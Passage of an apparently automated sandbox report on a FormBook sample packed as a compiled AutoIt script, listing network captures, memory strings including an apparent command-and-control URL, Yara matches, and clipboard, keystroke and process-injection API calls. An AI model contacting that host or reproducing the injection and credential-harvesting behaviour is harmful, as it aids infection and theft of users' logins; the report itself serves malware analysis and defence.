sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:08 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;

Source: XWDsAjkFcK.exe, 00000006.00000002.2560990702.00000000053A3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rtpterbaruwaktu3.xyz
Source: XWDsAjkFcK.exe, 00000006.00000002.2560990702.00000000053A3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rtpterbaruwaktu3.xyz/mv7p/
Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10339W
Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: winver.exe, 00000005.00000003.1908161878.0000000007DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: winver.exe, 00000005.00000002.2560762687.0000000005888000.00000004.10000000.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000002.2559116718.0000000003608000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.bt.cn/?from=404
Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_003D4164

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_003D4164

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003D3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_003D3F66

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003C001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_003C001C

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003ECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_003ECABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00363B3A
Source: aBEh0fsi2c.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: aBEh0fsi2c.exe, 00000000.00000000.1301225079.0000000000414000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_73d97cdf-c
Source: aBEh0fsi2c.exe, 00000000.00000000.1301225079.0000000000414000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_07295324-4
Source: aBEh0fsi2c.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5c2174d9-3
Source: aBEh0fsi2c.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_7c0ffb6a-8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C9F3 NtClose,	2_2_0042C9F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AA5D NtDelayExecution,	2_2_0040AA5D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72B60 NtClose,LdrInitializeThunk,	2_2_03A72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03A72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,	2_2_03A735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A74340 NtSetContextThread,	2_2_03A74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A74650 NtSuspendThread,	2_2_03A74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BA0 NtEnumerateValueKey,	2_2_03A72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72B80 NtQueryInformationFile,	2_2_03A72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BE0 NtQueryValueKey,	2_2_03A72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BF0 NtAllocateVirtualMemory,	2_2_03A72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AB0 NtWaitForSingleObject,	2_2_03A72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AF0 NtWriteFile,	2_2_03A72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AD0 NtReadFile,	2_2_03A72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FA0 NtQuerySection,	2_2_03A72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FB0 NtResumeThread,	2_2_03A72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F90 NtProtectVirtualMemory,	2_2_03A72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FE0 NtCreateFile,	2_2_03A72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F30 NtCreateSection,	2_2_03A72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F60 NtCreateProcessEx,	2_2_03A72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72EA0 NtAdjustPrivilegesToken,	2_2_03A72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72E80 NtReadVirtualMemory,	2_2_03A72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72EE0 NtQueueApcThread,	2_2_03A72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72E30 NtWriteVirtualMemory,	2_2_03A72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DB0 NtEnumerateKey,	2_2_03A72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DD0 NtDelayExecution,	2_2_03A72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D30 NtUnmapViewOfSection,	2_2_03A72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D00 NtSetInformationFile,	2_2_03A72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D10 NtMapViewOfSection,	2_2_03A72D10
